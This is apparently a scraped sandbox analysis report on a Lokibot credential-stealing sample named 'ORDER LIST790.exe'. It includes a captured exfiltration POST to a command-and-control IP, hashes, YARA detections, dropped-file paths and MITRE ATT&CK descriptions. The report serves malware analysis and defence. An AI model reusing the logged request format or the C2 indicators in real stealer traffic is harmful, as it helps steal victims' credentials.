20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 6f 70 65 6e 2d 73 61 6e 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 09 09 20 0d 0a 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 31 30 2c 20 32 34 2c 20 35 35 2c 20 31 29 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 7d 0d 0a 0d 0a 68 32 2c 20 68 33 2c 20 68 34 20 7b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0d 0a 7d 0d 0a 0d 0a 68 32 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 32 31 32 2c 32 31 32 2c 32 32 31 29 3b 20 2f 2a 20 4f 6c 64 20 62 72 6f 77 73 65 72 73 20 2a 2f 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 65 6c 6c 69 70 73 65 20 61 74 20 63 65 6e 74 65 72 20 74 6f 70 2c 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 31 29 20 30 25 2c 72 67 62 61 28 31 37 34 2c 31 37 34 2c 31 38 33 2c 31 29 20 31 30 30 25 29 3b 20 2f 2a 20 57 33 43 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 68 31 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 38 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 32 70 78 20 30 70 78 20 23 61 62 63 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Apache HTTP Server Test Page powered by CentOS</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ... Bootstrap --> <link href="/noindex/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" /><style type="text/css">... body { font-family: "Open Sans", Helvetica, sans-serif; font-weight: 100; color: #ccc; background: rgba(10, 24, 55, 1); font-size: 16px;}h2, h3, h4 { font-weight: 200;}h2 { font-size: 28px;}.jumbotron { margin-bottom: 0; color: #333; background: rgb(212,212,221); /* Old browsers / background: radial-gradient(ellipse at center top, rgba(255,255,255,1) 0%,rgba(174,174,183,1) 100%); / W3C */}.jumbotron h1 { font-size: 128px; font-weight: 700; color: white; text-shadow: 0px 2px 0px #abc,

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49743	66.29.145.162	80	C:\Users\user\Desktop\ORDER LIST790.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 05:37:28.256445885 CEST	1034	OUT	POST /?112233 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 66.29.145.162 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 6B020D42 Content-Length: 163 Connection: close
Aug 11, 2022 05:37:29.144061089 CEST	1036	IN	HTTP/1.1 200 OK Date: Thu, 11 Aug 2022 03:37:28 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Length: 5017 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 48 54 54 50 20 53 65 72 76 65 72 20 54 65 73 74 20 50 61 67 65 20 70 6f 77 65 72 65 64 20 62 79 20 43 65 6e 74 4f 53 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 6e 6f 69 6e 64 65 78 2f 63 73 73 2f 6f 70 65 6e 2d 73 61 6e 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 09 09 20 0d 0a 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 31 30 2c 20 32 34 2c 20 35 35 2c 20 31 29 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 7d 0d 0a 0d 0a 68 32 2c 20 68 33 2c 20 68 34 20 7b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0d 0a 7d 0d 0a 0d 0a 68 32 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 32 31 32 2c 32 31 32 2c 32 32 31 29 3b 20 2f 2a 20 4f 6c 64 20 62 72 6f 77 73 65 72 73 20 2a 2f 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 65 6c 6c 69 70 73 65 20 61 74 20 63 65 6e 74 65 72 20 74 6f 70 2c 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 31 29 20 30 25 2c 72 67 62 61 28 31 37 34 2c 31 37 34 2c 31 38 33 2c 31 29 20 31 30 30 25 29 3b 20 2f 2a 20 57 33 43 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 2e 6a 75 6d 62 6f 74 72 6f 6e 20 68 31 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 38 70 78 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 32 70 78 20 30 70 78 20 23 61 62 63 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Apache HTTP Server Test Page powered by CentOS</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ... Bootstrap --> <link href="/noindex/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" /><style type="text/css">... body { font-family: "Open Sans", Helvetica, sans-serif; font-weight: 100; color: #ccc; background: rgba(10, 24, 55, 1); font-size: 16px;}h2, h3, h4 { font-weight: 200;}h2 { font-size: 28px;}.jumbotron { margin-bottom: 0; color: #333; background: rgb(212,212,221); /* Old browsers / background: radial-gradient(ellipse at center top, rgba(255,255,255,1) 0%,rgba(174,174,183,1) 100%); / W3C */}.jumbotron h1 { font-size: 128px; font-weight: 700; color: white; text-shadow: 0px 2px 0px #abc,

Target ID:	0
Start time:	05:37:04
Start date:	11/08/2022
Path:	C:\Users\user\Desktop\ORDER LIST790.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ORDER LIST790.exe"
Imagebase:	0xeb0000
File size:	872960 bytes
MD5 hash:	80E4B72D26806ED5F245142166A48145
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: ORDER LIST790.exePID: 1672, Parent PID: 980

General

Target ID:	4
Start time:	05:37:18
Start date:	11/08/2022
Path:	C:\Users\user\Desktop\ORDER LIST790.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\ORDER LIST790.exe
Imagebase:	0xa80000
File size:	872960 bytes
MD5 hash:	80E4B72D26806ED5F245142166A48145
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000000.268189869.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ORDER LIST790.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Lokibot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER LIST790.exe.log

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
ORDER LIST790.exe